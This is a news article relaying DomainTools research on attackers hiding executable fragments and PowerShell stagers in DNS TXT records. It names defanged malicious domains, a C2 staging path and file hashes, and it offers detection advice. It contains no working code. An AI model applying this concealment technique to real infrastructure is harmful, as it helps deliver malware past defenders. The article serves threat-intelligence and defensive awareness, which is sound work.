Researchers at DomainTools have uncovered how DNS TXT records are exploited to store and distribute malicious files, including executables and remote control commands.
A recent investigation by the DomainTools team revealed a sophisticated method used by malicious actors to hide and propagate malware through DNS system TXT records. This technique, far from being theoretical, was identified on at least three domains between 2021 and 2022. It enables attackers to conceal fragments of executable files and even attack scripts within subdomains without raising suspicion.
The DNS, one of the Internet’s pillars, functions like a digital “phone book” that translates domain names into IP addresses. However, TXT records—originally meant to contain human-readable information related to a domain, such as email verification data—have become a potential tool for cybercrime.
How this type of attack works
The discovered method begins with the partitioning of files (such as images or executables) and their conversion into hexadecimal format. These fragments are inserted into multiple TXT records across subdomains under a main domain, for example, *.felix.stf.whitetreecollective[.]com, one of the investigated domains. Thanks to this fragmentation, attackers can hide a complete file (e.g., an .exe) among hundreds of sequenced subdomains.
Using an AI-generated script, researchers were able to reconstruct the stored files in the DNS records. The recovered files were two executables with the following SHA256 hashes:
7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1
Both matched a type of malware known as Joke Screenmate, software that mimics destructive or annoying behaviors such as displaying fake errors, filling screens with animated characters, complicating mouse control, and degrading system performance. While initially seeming harmless or humorous, such programs can serve as distractions for other attacks or significantly impair user experience.
Beyond a prank: embedded malicious commands
The DomainTools report also documented a more dangerous use: embedding encoded commands, such as PowerShell scripts that connect to command-and-control (C2) servers. For instance, a script was found on a DNS record associated with drsmitty[.]com acting as a staging tool to download payloads from another domain, cspg[.]pw, specifically from /api/v1/nps/payload/stage1. This URL resembles behavior typical of Covenant C2 servers—popular platforms for command and control used in penetration tests but also exploited by malicious actors.
Storing a script in a DNS record alone doesn’t trigger an attack; the victim’s system must first access and execute the content. Nonetheless, this clandestine storage method can bypass traditional detection tools, especially when combined with social engineering or pre-existing malware.
Why is this technique concerning?
- Persistence without external intervention: DNS records can remain active for long periods if unmonitored or unaltered, keeping hidden files available for reconstruction.
- Detection difficulty: Since DNS traffic is legitimate protocol use, many security solutions do not regard DNS as suspicious by default.
- Reduced reliance on visible malicious servers: Instead of hosting malware on a compromised server, all content can be distributed within seemingly legitimate domain infrastructure.
A challenge for defenders
This case highlights how attackers continue exploring creative and alternative methods to evade traditional defenses. Using DNS as a malware distribution channel isn’t new, but the level of sophistication and automation observed here is alarming.
Defenders increasingly need to monitor not just DNS queries but also their content. Tools like DNSDB Scout, used in this investigation, can passively analyze DNS records and detect suspicious patterns—such as hexadecimal-encoded file headers or unusual subdomain activity.
Cybersecurity teams should incorporate DNS record analysis into their threat intelligence workflows and develop detection rules that flag anomalies like frequent queries to numeric subdomains or unusually long TXT records.
Conclusion
Between 2021 and 2022, at least one malicious entity exploited DNS as a platform to store and distribute malware, leveraging TXT records to hide everything from pranks to scripts linked to command-and-control servers. Although not entirely new, these quiet techniques emphasize the importance of ongoing vigilance and deeper insights into network services traditionally deemed neutral.
Malware no longer solely travels via emails or malicious links; it can hide in the most unexpected corners of Internet infrastructure. Experts warn this might only be the beginning.
via: dti.domaintools.com